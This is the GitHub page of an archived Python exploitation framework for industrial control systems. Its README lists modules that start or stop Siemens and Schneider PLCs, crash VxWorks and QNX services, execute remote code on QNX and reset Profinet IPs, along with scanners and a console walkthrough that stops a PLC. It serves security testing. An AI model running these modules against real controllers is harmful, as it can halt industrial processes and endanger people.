Skip to content
This repository was archived by the owner on Apr 25, 2024. It is now read-only.

dark-lbp/isf

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

68 Commits
docs
docs
 
 
icssploit
icssploit
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
README.zh-cn.md
README.zh-cn.md
 
 
isf.ini
isf.ini
 
 
isf.py
isf.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Industrial Exploitation Framework

ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it's similar to metasploit framework.

ISF is based on open source project routersploit.

Read this in other languages: English, 简体中文,

Disclaimer

Usage of ISF for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

ICS Protocol Clients

Name Path Description
modbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP Client
wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version 2 Client(Vxworks 6.x)
s7_client icssploit/clients/s7_client.py s7comm Client(S7 300/400 PLC)

Exploit Module

Name Path Description
s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC start/stop
s7_1200_plc_control exploits/plcs/siemens/s7_1200_plc_control.py S7-1200 PLC start/stop/reset
vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC remote dos(CVE-2015-7599)
quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140 series PLC start/stop
crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py QNX Inetd TCP service dos
qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX qconn remote code execution
profinet_set_ip exploits/plcs/siemens/profinet_set_ip.py Profinet DCP device IP config

Scanner Module

Name Path Description
profinet_dcp_scan scanners/profinet_dcp_scan.py Profinet DCP scanner
vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x scanner
s7comm_scan scanners/s7comm_scan.py S7comm scanner
enip_scan scanners/enip_scan.py EthernetIP scanner

ICS Protocols Module (Scapy Module)

These protocol can used in other Fuzzing framework like Kitty or create your own client.

Name Path Description
pn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol
modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol
wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version 2 Protocol
s7comm icssploit/protocols/s7comm.py S7comm Protocol

Install

Python requirements

Install on Kali

git clone https://github.com/dark-lbp/isf/ cd isf python isf.py

Usage

 root@kali:~/Desktop/temp/isf# python isf.py _____ _____ _____ _____ _____ _ ____ _____ _______ |_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __| | || | | (___| (___ | |__) | | | | | || | | | | || | \___ \\___ \| ___/| | | | | || | | | _| || |____ ____) |___) | | | |___| |__| || |_ | | |_____\_____|_____/_____/|_| |______\____/_____| |_| ICS Exploitation Framework Note : ICSSPOLIT is fork from routersploit at https://github.com/reverse-shell/routersploit Dev Team : wenzhe zhu(dark-lbp) Version : 0.1.0 Exploits: 2 Scanners: 0 Creds: 13 ICS Exploits: PLC: 2 ICS Switch: 0 Software: 0 isf >

Exploits

isf > use exploits/plcs/ exploits/plcs/siemens/ exploits/plcs/vxworks/ isf > use exploits/plcs/siemens/s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control isf > use exploits/plcs/siemens/s7_300_400_plc_control isf (S7-300/400 PLC Control) >

You can use the tab key for completion.

Options

Display module options:

isf (S7-300/400 PLC Control) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target address e.g. 192.168.1.1 port 102 Target Port Module options: Name Current settings Description ---- ---------------- ----------- slot 2 CPU slot number. command 1 Command 0:start plc, 1:stop plc. isf (S7-300/400 PLC Control) >

Set options

isf (S7-300/400 PLC Control) > set target 192.168.70.210 [+] {'target': '192.168.70.210'}

Run module

isf (S7-300/400 PLC Control) > run [*] Running module... [+] Target is alive [*] Sending packet to target [*] Stop plc isf (S7-300/400 PLC Control) >

Display information about exploit

isf (S7-300/400 PLC Control) > show info Name: S7-300/400 PLC Control Description: Use S7comm command to start/stop plc. Devices: - Siemens S7-300 and S7-400 programmable logic controllers (PLCs) Authors: - wenzhe zhu <jtrkid[at]gmail.com> References: isf (S7-300/400 PLC Control) >

Documents

About

ISF(Industrial Control System Exploitation Framework),a exploitation framework based on Python

Topics

modbus exploits plc ics scada scapy isf ics-poc ics-exp

Resources

Readme

License

BSD-2-Clause license
Activity

Stars

1.1k stars

Watchers

62 watching

Forks

300 forks
Report repository

Releases 1

Python2 archive release Latest
Mar 17, 2020

Packages

 
 
 

Contributors

Languages